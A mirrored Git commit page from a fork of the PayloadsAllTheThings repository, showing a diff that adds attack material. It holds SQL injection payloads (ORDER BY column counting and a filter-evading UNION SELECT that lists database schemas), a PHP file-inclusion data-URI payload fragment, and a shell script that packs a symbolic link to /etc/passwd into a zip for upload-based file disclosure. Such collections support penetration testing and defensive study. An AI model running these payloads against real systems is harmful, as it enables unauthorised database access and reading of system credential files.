ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-21 14:16:07 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Symbolic Link Zip + SQL injection ORDER BY

Browse Source
This commit is contained in:
Swissky 2017-07-04 23:17:59 +02:00
parent a1fbd41bbb
commit 6070ece522
4 changed files with 16 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
PHP include/README.md
View File

@ -51,4 +51,5 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
```
## Thanks to
* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)

10
SQL injection/MySQL Injection.md
View File

@ -1,5 +1,15 @@
# MYSQL Injection
##Detect columns number
Using a simple ORDER
```
order by 1
order by 2
order by 3
...
order by XXX
```
##MySQL Union Based
```
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata

BIN
Upload insecure files/ZIP Symbolic Link/etc_passwd.zip Normal file
View File

Binary file not shown.

2
Upload insecure files/ZIP Symbolic Link/generate.sh Normal file
View File

@ -0,0 +1,2 @@
ln -s /etc/passwd link
zip --symlinks test.zip link